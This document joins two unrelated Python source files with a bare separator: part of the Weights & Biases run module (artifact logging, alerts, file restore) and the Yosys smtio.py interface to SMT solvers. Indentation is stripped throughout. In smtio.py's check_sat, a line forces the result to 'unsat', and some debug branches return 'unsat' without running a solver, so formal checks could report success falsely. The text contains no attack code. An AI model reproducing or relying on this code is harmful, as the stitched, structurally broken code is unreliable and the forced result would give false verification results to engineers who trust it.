- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot finish artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name,
type,
aliases,
distributed_id=distributed_id,
finalize=True,
)
def _log_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
distributed_id = None,
finalize = True,
is_user_created = False,
use_after_commit = False,
):
if not finalize and distributed_id is None:
raise TypeError("Must provide distributed_id if artifact is not finalize")
artifact, aliases = self._prepare_artifact(
artifact_or_path, name, type, aliases
)
artifact.distributed_id = distributed_id
self._assert_can_log_artifact(artifact)
if self._backend:
if not self._settings._offline:
future = self._backend.interface.communicate_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
artifact._logged_artifact = _LazyArtifact(self._public_api(), future)
else:
self._backend.interface.publish_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
return artifact
def _public_api(self):
overrides = {"run": self.id}
run_obj = self._run_obj
if run_obj is not None:
overrides["entity"] = run_obj.entity
overrides["project"] = run_obj.project
return public.Api(overrides)
# TODO(jhr): annotate this
def _assert_can_log_artifact(self, artifact): # type: ignore
if not self._settings._offline:
public_api = self._public_api()
expected_type = public.Artifact.expected_type(
public_api.client,
artifact.name,
public_api.settings["entity"],
public_api.settings["project"],
)
if expected_type is not None and artifact.type != expected_type:
raise ValueError(
"Expected artifact type {}, got {}".format(
expected_type, artifact.type
)
)
def _prepare_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
):
aliases = aliases or ["latest"]
if isinstance(artifact_or_path, str):
if name is None:
name = "run-%s-%s" % (self.id, os.path.basename(artifact_or_path))
artifact = wandb.Artifact(name, type)
if os.path.isfile(artifact_or_path):
artifact.add_file(artifact_or_path)
elif os.path.isdir(artifact_or_path):
artifact.add_dir(artifact_or_path)
elif "://" in artifact_or_path:
artifact.add_reference(artifact_or_path)
else:
raise ValueError(
"path must be a file, directory or external"
"reference like s3://bucket/path"
)
else:
artifact = artifact_or_path
if not isinstance(artifact, wandb.Artifact):
raise ValueError(
"You must pass an instance of wandb.Artifact or a "
"valid file path to log_artifact"
)
if isinstance(aliases, str):
aliases = [aliases]
artifact.finalize()
return artifact, aliases
def alert(
self,
title,
text,
level = None,
wait_duration = None,
):
"""Launch an alert with the given title and text.
Arguments:
title: (str) The title of the alert, must be less than 64 characters long.
text: (str) The text body of the alert.
level: (str or wandb.AlertLevel, optional) The alert level to use, either: `INFO`, `WARN`, or `ERROR`.
wait_duration: (int, float, or timedelta, optional) The time to wait (in seconds) before sending another
alert with this title.
"""
level = level or wandb.AlertLevel.INFO
if isinstance(level, wandb.AlertLevel):
level = level.value
if level not in (
wandb.AlertLevel.INFO.value,
wandb.AlertLevel.WARN.value,
wandb.AlertLevel.ERROR.value,
):
raise ValueError("level must be one of 'INFO', 'WARN', or 'ERROR'")
wait_duration = wait_duration or timedelta(minutes=1)
if isinstance(wait_duration, int) or isinstance(wait_duration, float):
wait_duration = timedelta(seconds=wait_duration)
elif not callable(getattr(wait_duration, "total_seconds", None)):
raise ValueError(
"wait_duration must be an int, float, or datetime.timedelta"
)
wait_duration = int(wait_duration.total_seconds() * 1000)
if self._backend:
self._backend.interface.publish_alert(title, text, level, wait_duration)
def __enter__(self):
return self
def __exit__(
self,
exc_type,
exc_val,
exc_tb,
):
exit_code = 0 if exc_type is None else 1
self.finish(exit_code)
return exc_type is None
# We define this outside of the run context to support restoring before init
def restore(
name,
run_path = None,
replace = False,
root = None,
):
""" Downloads the specified file from cloud storage into the current directory
or run directory. By default this will only download the file if it doesn't
already exist.
Arguments:
name: the name of the file
run_path: optional path to a run to pull files from, i.e. `username/project_name/run_id`
if wandb.init has not been called, this is required.
replace: whether to download the file even if it already exists locally
root: the directory to download the file to. Defaults to the current
directory or the run directory if wandb.init was called.
Returns:
None if it can't find the file, otherwise a file object open for reading
Raises:
wandb.CommError: if we can't connect to the wandb backend
ValueError: if the file is not found or can't find run_path
"""
is_disabled = wandb.run is not None and wandb.run.disabled
run = None if is_disabled else wandb.run
if run_path is None:
if run is not None:
run_path = run.path
else:
raise ValueError(
"run_path required when calling wandb.restore before wandb.init"
)
if root is None:
if run is not None:
root = run.dir
api = public.Api()
api_run = api.run(run_path)
if root is None:
root = os.getcwd()
path = os.path.join(root, name)
if os.path.exists(path) and replace is False:
return open(path, "r")
if is_disabled:
return None
files = api_run.files([name])
if len(files) == 0:
return None
# if the file does not exist, the file has an md5 of 0
if files[0].md5 == "0":
raise ValueError("File {} not found in {}.".format(name, run_path or root))
return files[0].download(root=root, replace=True)
# propigate our doc string to the runs restore method
try:
Run.restore.__doc__ = restore.__doc__
# py2 doesn't let us set a doc string, just pass
except AttributeError:
pass
def finish(exit_code = None):
"""
Marks a run as finished, and finishes uploading all data.
This is used when creating multiple runs in the same process.
We automatically call this method when your script exits.
"""
if wandb.run:
wandb.run.finish(exit_code=exit_code)
# propagate our doc string to the runs restore method
try:
Run.restore.__doc__ = restore.__doc__
# py2 doesn't let us set a doc string, just pass
except AttributeError:
pass
class _LazyArtifact(ArtifactInterface):
# _api: PublicApi
_instance = None
# _future: Any
def __init__(self, api, future):
self._api = api
self._future = future
def _assert_instance(self):
if not self._instance:
raise ValueError(
"Must call wait() before accessing logged artifact properties"
)
return self._instance
def __getattr__(self, item):
self._assert_instance()
return getattr(self._instance, item)
def wait(self):
if not self._instance:
resp = self._future.get().response.log_artifact_response
if resp.error_message:
raise ValueError(resp.error_message)
self._instance = public.Artifact.from_id(resp.artifact_id, self._api.client)
assert isinstance(self._instance, ArtifactInterface)
return self._instance
@property
def id(self):
return self._assert_instance().id
@property
def version(self):
return self._assert_instance().version
@property
def name(self):
return self._assert_instance().name
@property
def type(self):
return self._assert_instance().type
@property
def entity(self):
return self._assert_instance().entity
@property
def project(self):
return self._assert_instance().project
@property
def manifest(self):
return self._assert_instance().manifest
@property
def digest(self):
return self._assert_instance().digest
@property
def state(self):
return self._assert_instance().state
@property
def size(self):
return self._assert_instance().size
@property
def commit_hash(self):
return self._assert_instance().commit_hash
@property
def description(self):
return self._assert_instance().description
@description.setter
def description(self, desc):
self._assert_instance().description = desc
@property
def metadata(self):
return self._assert_instance().metadata
@metadata.setter
def metadata(self, metadata):
self._assert_instance().metadata = metadata
@property
def aliases(self):
return self._assert_instance().aliases
@aliases.setter
def aliases(self, aliases):
self._assert_instance().aliases = aliases
def used_by(self):
return self._assert_instance().used_by()
def logged_by(self):
return self._assert_instance().logged_by()
# Commenting this block out since this code is unreachable since LocalArtifact
# overrides them and therefore untestable.
# Leaving behind as we may want to support these in the future.
# def new_file(self, name: str, mode: str = "w") -> Any: # TODO: Refine Type
# return self._assert_instance().new_file(name, mode)
# def add_file(
# self,
# local_path: str,
# name: Optional[str] = None,
# is_tmp: Optional[bool] = False,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_file(local_path, name, is_tmp)
# def add_dir(self, local_path: str, name: Optional[str] = None) -> None:
# return self._assert_instance().add_dir(local_path, name)
# def add_reference(
# self,
# uri: Union["ArtifactEntry", str],
# name: Optional[str] = None,
# checksum: bool = True,
# max_objects: Optional[int] = None,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_reference(uri, name, checksum, max_objects)
# def add(self, obj: "WBValue", name: str) -> Any: # TODO: Refine Type
# return self._assert_instance().add(obj, name)
def get_path(self, name):
return self._assert_instance().get_path(name)
def get(self, name):
return self._assert_instance().get(name)
def download(self, root = None, recursive = False):
return self._assert_instance().download(root, recursive)
def checkout(self, root = None):
return self._assert_instance().checkout(root)
def verify(self, root = None):
return self._assert_instance().verify(root)
def save(self):
return self._assert_instance().save()
def delete(self):
return self._assert_instance().delete()
|
smtio.py
|
#
# yosys -- Yosys Open SYnthesis Suite
#
# Copyright (C) 2012 Clifford Wolf <clifford@clifford.at>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import sys, re, os, signal
import subprocess
if os.name == "posix":
import resource
from copy import deepcopy
from select import select
from time import time
from queue import Queue, Empty
from threading import Thread
# This is needed so that the recursive SMT2 S-expression parser
# does not run out of stack frames when parsing large expressions
if os.name == "posix":
smtio_reclimit = 64 * 1024
if sys.getrecursionlimit() < smtio_reclimit:
sys.setrecursionlimit(smtio_reclimit)
current_rlimit_stack = resource.getrlimit(resource.RLIMIT_STACK)
if current_rlimit_stack[0] != resource.RLIM_INFINITY:
smtio_stacksize = 128 * 1024 * 1024
if os.uname().sysname == "Darwin":
# MacOS has rather conservative stack limits
smtio_stacksize = 16 * 1024 * 1024
if current_rlimit_stack[1] != resource.RLIM_INFINITY:
smtio_stacksize = min(smtio_stacksize, current_rlimit_stack[1])
if current_rlimit_stack[0] < smtio_stacksize:
resource.setrlimit(resource.RLIMIT_STACK, (smtio_stacksize, current_rlimit_stack[1]))
# currently running solvers (so we can kill them)
running_solvers = dict()
forced_shutdown = False
solvers_index = 0
def force_shutdown(signum, frame):
global forced_shutdown
if not forced_shutdown:
forced_shutdown = True
if signum is not None:
print("<%s>" % signal.Signals(signum).name)
for p in running_solvers.values():
# os.killpg(os.getpgid(p.pid), signal.SIGTERM)
os.kill(p.pid, signal.SIGTERM)
sys.exit(1)
if os.name == "posix":
signal.signal(signal.SIGHUP, force_shutdown)
signal.signal(signal.SIGINT, force_shutdown)
signal.signal(signal.SIGTERM, force_shutdown)
def except_hook(exctype, value, traceback):
if not forced_shutdown:
sys.__excepthook__(exctype, value, traceback)
force_shutdown(None, None)
sys.excepthook = except_hook
hex_dict = {
"0": "0000", "1": "0001", "2": "0010", "3": "0011",
"4": "0100", "5": "0101", "6": "0110", "7": "0111",
"8": "1000", "9": "1001", "A": "1010", "B": "1011",
"C": "1100", "D": "1101", "E": "1110", "F": "1111",
"a": "1010", "b": "1011", "c": "1100", "d": "1101",
"e": "1110", "f": "1111"
}
class SmtModInfo:
def __init__(self):
self.inputs = set()
self.outputs = set()
self.registers = set()
self.memories = dict()
self.wires = set()
self.wsize = dict()
self.clocks = dict()
self.cells = dict()
self.asserts = dict()
self.covers = dict()
self.anyconsts = dict()
self.anyseqs = dict()
self.allconsts = dict()
self.allseqs = dict()
self.asize = dict()
class SmtIo:
def __init__(self, opts=None):
global solvers_index
self.logic = None
self.logic_qf = True
self.logic_ax = True
self.logic_uf = True
self.logic_bv = True
self.logic_dt = False
self.forall = False
self.produce_models = True
self.smt2cache = [list()]
self.p = None
self.p_index = solvers_index
solvers_index += 1
if opts is not None:
self.logic = opts.logic
self.solver = opts.solver
self.solver_opts = opts.solver_opts
self.debug_print = opts.debug_print
self.debug_file = opts.debug_file
self.dummy_file = opts.dummy_file
self.timeinfo = opts.timeinfo
self.unroll = opts.unroll
self.noincr = opts.noincr
self.info_stmts = opts.info_stmts
self.nocomments = opts.nocomments
else:
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.timeinfo = os.name != "nt"
self.unroll = False
self.noincr = False
self.info_stmts = list()
self.nocomments = False
self.start_time = time()
self.modinfo = dict()
self.curmod = None
self.topmod = None
self.setup_done = False
def __del__(self):
if self.p is not None and not forced_shutdown:
os.killpg(os.getpgid(self.p.pid), signal.SIGTERM)
if running_solvers is not None:
del running_solvers[self.p_index]
def setup(self):
assert not self.setup_done
if self.forall:
self.unroll = False
if self.solver == "yices":
if self.noincr:
self.popen_vargs = ['yices-smt2'] + self.solver_opts
else:
self.popen_vargs = ['yices-smt2', '--incremental'] + self.solver_opts
if self.solver == "z3":
self.popen_vargs = ['z3', '-smt2', '-in'] + self.solver_opts
if self.solver == "cvc4":
if self.noincr:
self.popen_vargs = ['cvc4', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
else:
self.popen_vargs = ['cvc4', '--incremental', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
if self.solver == "mathsat":
self.popen_vargs = ['mathsat'] + self.solver_opts
if self.solver == "boolector":
if self.noincr:
self.popen_vargs = ['boolector', '--smt2'] + self.solver_opts
else:
self.popen_vargs = ['boolector', '--smt2', '-i'] + self.solver_opts
self.unroll = True
if self.solver == "abc":
if len(self.solver_opts) > 0:
self.popen_vargs = ['yosys-abc', '-S', '; '.join(self.solver_opts)]
else:
self.popen_vargs = ['yosys-abc', '-S', '%blast; &sweep -C 5000; &syn4; &cec -s -m -C 2000']
self.logic_ax = False
self.unroll = True
self.noincr = True
if self.solver == "dummy":
assert self.dummy_file is not None
self.dummy_fd = open(self.dummy_file, "r")
else:
if self.dummy_file is not None:
self.dummy_fd = open(self.dummy_file, "w")
if not self.noincr:
self.p_open()
if self.unroll:
assert not self.forall
self.logic_uf = False
self.unroll_idcnt = 0
self.unroll_buffer = ""
self.unroll_sorts = set()
self.unroll_objs = set()
self.unroll_decls = dict()
self.unroll_cache = dict()
self.unroll_stack = list()
if self.logic is None:
self.logic = ""
if self.logic_qf: self.logic += "QF_"
if self.logic_ax: self.logic += "A"
if self.logic_uf: self.logic += "UF"
if self.logic_bv: self.logic += "BV"
if self.logic_dt: self.logic = "ALL"
self.setup_done = True
for stmt in self.info_stmts:
self.write(stmt)
if self.produce_models:
self.write("(set-option :produce-models true)")
self.write("(set-logic %s)" % self.logic)
def timestamp(self):
secs = int(time() - self.start_time)
return "## %3d:%02d:%02d " % (secs // (60*60), (secs // 60) % 60, secs % 60)
def replace_in_stmt(self, stmt, pat, repl):
if stmt == pat:
return repl
if isinstance(stmt, list):
return [self.replace_in_stmt(s, pat, repl) for s in stmt]
return stmt
def unroll_stmt(self, stmt):
if not isinstance(stmt, list):
return stmt
stmt = [self.unroll_stmt(s) for s in stmt]
if len(stmt) >= 2 and not isinstance(stmt[0], list) and stmt[0] in self.unroll_decls:
assert stmt[1] in self.unroll_objs
key = tuple(stmt)
if key not in self.unroll_cache:
decl = deepcopy(self.unroll_decls[key[0]])
self.unroll_cache[key] = "|UNROLL#%d|" % self.unroll_idcnt
decl[1] = self.unroll_cache[key]
self.unroll_idcnt += 1
if decl[0] == "declare-fun":
if isinstance(decl[3], list) or decl[3] not in self.unroll_sorts:
self.unroll_objs.add(decl[1])
decl[2] = list()
else:
self.unroll_objs.add(decl[1])
decl = list()
elif decl[0] == "define-fun":
arg_index = 1
for arg_name, arg_sort in decl[2]:
decl[4] = self.replace_in_stmt(decl[4], arg_name, key[arg_index])
arg_index += 1
decl[2] = list()
if len(decl) > 0:
decl = self.unroll_stmt(decl)
self.write(self.unparse(decl), unroll=False)
return self.unroll_cache[key]
return stmt
def p_thread_main(self):
while True:
data = self.p.stdout.readline().decode("ascii")
if data == "": break
self.p_queue.put(data)
self.p_queue.put("")
self.p_running = False
def p_open(self):
if self.debug_file:
return
assert self.p is None
self.p = subprocess.Popen(self.popen_vargs, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
running_solvers[self.p_index] = self.p
self.p_running = True
self.p_next = None
self.p_queue = Queue()
self.p_thread = Thread(target=self.p_thread_main)
self.p_thread.start()
def p_write(self, data, flush):
if self.p == None:
return
assert self.p is not None
self.p.stdin.write(bytes(data, "ascii"))
if flush: self.p.stdin.flush()
def p_read(self):
if self.debug_file:
return "unsat"
assert self.p is not None
if self.p_next is not None:
data = self.p_next
self.p_next = None
return data
if not self.p_running:
return ""
return self.p_queue.get()
def p_poll(self, timeout=0.1):
if self.debug_file:
return False
assert self.p is not None
assert self.p_running
if self.p_next is not None:
return False
try:
self.p_next = self.p_queue.get(True, timeout)
return False
except Empty:
return True
def p_close(self):
assert self.p is not None
self.p.stdin.close()
self.p_thread.join()
assert not self.p_running
del running_solvers[self.p_index]
self.p = None
self.p_next = None
self.p_queue = None
self.p_thread = None
def write(self, stmt, unroll=True):
if stmt.startswith(";"):
self.info(stmt)
if not self.setup_done:
self.info_stmts.append(stmt)
return
elif not self.setup_done:
self.setup()
stmt = stmt.strip()
if self.nocomments or self.unroll:
stmt = re.sub(r" *;.*", "", stmt)
if stmt == "": return
if unroll and self.unroll:
stmt = self.unroll_buffer + stmt
self.unroll_buffer = ""
s = re.sub(r"\|[^|]*\|", "", stmt)
if s.count("(") != s.count(")"):
self.unroll_buffer = stmt + " "
return
s = self.parse(stmt)
if self.debug_print:
print("-> %s" % s)
if len(s) == 3 and s[0] == "declare-sort" and s[2] == "0":
self.unroll_sorts.add(s[1])
return
elif len(s) == 4 and s[0] == "declare-fun" and s[2] == [] and s[3] in self.unroll_sorts:
self.unroll_objs.add(s[1])
return
elif len(s) >= 4 and s[0] == "declare-fun":
for arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
elif len(s) >= 4 and s[0] == "define-fun":
for arg_name, arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
stmt = self.unparse(self.unroll_stmt(s))
if stmt == "(push 1)":
self.unroll_stack.append((
deepcopy(self.unroll_sorts),
deepcopy(self.unroll_objs),
deepcopy(self.unroll_decls),
deepcopy(self.unroll_cache),
))
if stmt == "(pop 1)":
self.unroll_sorts, self.unroll_objs, self.unroll_decls, self.unroll_cache = self.unroll_stack.pop()
if self.debug_print:
print("> %s" % stmt)
if self.debug_file:
print(stmt, file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None and not stmt.startswith("(get-"):
self.p_close()
if stmt == "(push 1)":
self.smt2cache.append(list())
elif stmt == "(pop 1)":
self.smt2cache.pop()
else:
if self.p is not None:
self.p_write(stmt + "\n", True)
self.smt2cache[-1].append(stmt)
else:
self.p_write(stmt + "\n", True)
def info(self, stmt):
if not stmt.startswith("; yosys-smt2-"):
return
fields = stmt.split()
if fields[1] == "yosys-smt2-nomem":
if self.logic is None:
self.logic_ax = False
if fields[1] == "yosys-smt2-nobv":
if self.logic is None:
self.logic_bv = False
if fields[1] == "yosys-smt2-stdt":
if self.logic is None:
self.logic_dt = True
if fields[1] == "yosys-smt2-forall":
if self.logic is None:
self.logic_qf = False
self.forall = True
if fields[1] == "yosys-smt2-module":
self.curmod = fields[2]
self.modinfo[self.curmod] = SmtModInfo()
if fields[1] == "yosys-smt2-cell":
self.modinfo[self.curmod].cells[fields[3]] = fields[2]
if fields[1] == "yosys-smt2-topmod":
self.topmod = fields[2]
if fields[1] == "yosys-smt2-input":
self.modinfo[self.curmod].inputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-output":
self.modinfo[self.curmod].outputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-register":
self.modinfo[self.curmod].registers.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-memory":
self.modinfo[self.curmod].memories[fields[2]] = (int(fields[3]), int(fields[4]), int(fields[5]), int(fields[6]), fields[7] == "async")
if fields[1] == "yosys-smt2-wire":
self.modinfo[self.curmod].wires.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-clock":
for edge in fields[3:]:
if fields[2] not in self.modinfo[self.curmod].clocks:
self.modinfo[self.curmod].clocks[fields[2]] = edge
elif self.modinfo[self.curmod].clocks[fields[2]] != edge:
self.modinfo[self.curmod].clocks[fields[2]] = "event"
if fields[1] == "yosys-smt2-assert":
self.modinfo[self.curmod].asserts["%s_a %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-cover":
self.modinfo[self.curmod].covers["%s_c %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-anyconst":
self.modinfo[self.curmod].anyconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-anyseq":
self.modinfo[self.curmod].anyseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allconst":
self.modinfo[self.curmod].allconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allseq":
self.modinfo[self.curmod].allseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
def hiernets(self, top, regs_only=False):
def hiernets_worker(nets, mod, cursor):
for netname in sorted(self.modinfo[mod].wsize.keys()):
if not regs_only or netname in self.modinfo[mod].registers:
nets.append(cursor + [netname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiernets_worker(nets, celltype, cursor + [cellname])
nets = list()
hiernets_worker(nets, top, [])
return nets
def hieranyconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hieranyseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hiermems(self, top):
def hiermems_worker(mems, mod, cursor):
for memname in sorted(self.modinfo[mod].memories.keys()):
mems.append(cursor + [memname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiermems_worker(mems, celltype, cursor + [cellname])
mems = list()
hiermems_worker(mems, top, [])
return mems
def read(self):
stmt = []
count_brackets = 0
while True:
if self.solver == "dummy":
line = self.dummy_fd.readline().strip()
else:
line = self.p_read().strip()
if self.dummy_file is not None:
self.dummy_fd.write(line + "\n")
count_brackets += line.count("(")
count_brackets -= line.count(")")
stmt.append(line)
if self.debug_print:
print("< %s" % line)
if count_brackets == 0:
break
if self.solver != "dummy" and self.p.poll():
print("%s Solver terminated unexpectedly: %s" % (self.timestamp(), "".join(stmt)), flush=True)
sys.exit(1)
stmt = "".join(stmt)
if stmt.startswith("(error"):
print("%s Solver Error: %s" % (self.timestamp(), stmt), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return stmt
def check_sat(self):
if self.debug_print:
print("> (check-sat)")
if self.debug_file and not self.nocomments:
print("; running check-sat..", file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None:
self.p_close()
self.p_open()
for cache_ctx in self.smt2cache:
for cache_stmt in cache_ctx:
self.p_write(cache_stmt + "\n", False)
self.p_write("(check-sat)\n", True)
if self.timeinfo:
i = 0
s = "/-\|"
count = 0
num_bs = 0
while self.p_poll():
count += 1
if count < 25:
continue
if count % 10 == 0 or count == 25:
secs = count // 10
if secs < 60:
m = "(%d seconds)" % secs
elif secs < 60*60:
m = "(%d seconds -- %d:%02d)" % (secs, secs // 60, secs % 60)
else:
m = "(%d seconds -- %d:%02d:%02d)" % (secs, secs // (60*60), (secs // 60) % 60, secs % 60)
print("%s %s %c" % ("\b \b" * num_bs, m, s[i]), end="", file=sys.stderr)
num_bs = len(m) + 3
else:
print("\b" + s[i], end="", file=sys.stderr)
sys.stderr.flush()
i = (i + 1) % len(s)
if num_bs != 0:
print("\b \b" * num_bs, end="", file=sys.stderr)
sys.stderr.flush()
else:
count = 0
while self.p_poll(60):
count += 1
msg = None
if count == 1:
msg = "1 minute"
elif count in [5, 10, 15, 30]:
msg = "%d minutes" % count
elif count == 60:
msg = "1 hour"
elif count % 60 == 0:
msg = "%d hours" % (count // 60)
if msg is not None:
print("%s waiting for solver (%s)" % (self.timestamp(), msg), flush=True)
result = self.read()
if self.debug_file:
print("(set-info :status %s)" % result, file=self.debug_file)
print("(check-sat)", file=self.debug_file)
self.debug_file.flush()
result='unsat'
if result not in ["sat", "unsat"]:
if result == "":
print("%s Unexpected EOF response from solver." % (self.timestamp()), flush=True)
else:
print("%s Unexpected response from solver: %s" % (self.timestamp(), result), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return result
def parse(self, stmt):
def worker(stmt):
if stmt[0] == '(':
expr = []
cursor = 1
while stmt[cursor] != ')':
el, le = worker(stmt[cursor:])
expr.append(el)
cursor += le
return expr, cursor+1
if stmt[0] == '|':
expr = "|"
cursor = 1
while stmt[cursor] != '|':
expr += stmt[cursor]
cursor += 1
expr += "|"
return expr, cursor+1
if stmt[0] in [" ", "\t", "\r", "\n"]:
el, le = worker(stmt[1:])
return el, le+1
expr = ""
cursor = 0
while stmt[cursor] not in ["(", ")", "|", " ", "\t", "\r", "\n"]:
expr += stmt[cursor]
cursor += 1
return expr, cursor
return worker(stmt)[0]
def unparse(self, stmt):
if isinstance(stmt, list):
return "(" + " ".join([self.unparse(s) for s in stmt]) + ")"
return stmt
def bv2hex(self, v):
h = ""
v = self.bv2bin(v)
while len(v) > 0:
d = 0
if len(v) > 0 and v[-1] == "1": d += 1
if len(v) > 1 and v[-2] == "1": d += 2
if len(v) > 2 and v[-3] == "1": d += 4
if len(v) > 3 and v[-4] == "1": d += 8
h = hex(d)[2:] + h
if len(v) < 4: break
v = v[:-4]
return h
def bv2bin(self, v):
if type(v) is list and len(v) == 3 and v[0] == "_" and v[1].startswith("bv"):
x, n = int(v[1][2:]), int(v[2])
return "".join("1" if (x & (1 << i)) else "0" for i in range(n-1, -1, -1))
if v == "true": return "1"
if v == "false": return "0"
if v.startswith("#b"):
return v[2:]
if v.startswith("#x"):
return "".join(hex_dict.get(x) for x in v[2:])
assert False
def bv2int(self, v):
return int(self.bv2bin(v), 2)
def get(self, expr):
self.write("(get-value (%s))" % (expr))
return self.parse(self.read())[0][1]
def get_list(self, expr_list):
if len(expr_list) == 0:
return []
self.write("(get-value (%s))" % " ".join(expr_list))
return [n[1] for n in self.parse(self.read())]
def get_path(self, mod, path):
assert mod in self.modinfo
path = path.split(".")
for i in range(len(path)-1):
first = ".".join(path[0:i+1])
second = ".".join(path[i+1:])
if first in self.modinfo[mod].cells:
nextmod = self.modinfo[mod].cells[first]
return [first] + self.get_path(nextmod, second)
return [".".join(path)]
def net_expr(self, mod, base, path):
if len(path) == 0:
return base
if len(path) == 1:
assert mod in self.modinfo
if path[0] == "":
return base
if path[0] in self.modinfo[mod].cells:
return "(|%s_h %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].wsize:
return "(|%s_n %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].memories:
return "(|%s_m %s| %s)" % (mod, path[0], base)
assert 0
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.net_expr(nextmod, nextbase, path[1:])
def net_width(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
assert net_path[-1] in self.modinfo[mod].wsize
return self.modinfo[mod].wsize[net_path[-1]]
def net_clock(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
if net_path[-1] not in self.modinfo[mod].clocks:
return None
return self.modinfo[mod].clocks[net_path[-1]]
def net_exists(self, mod, net_path):
for i in range(len(net_path)-1):
if mod not in self.modinfo: return False
if net_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[net_path[i]]
if mod not in self.modinfo: return False
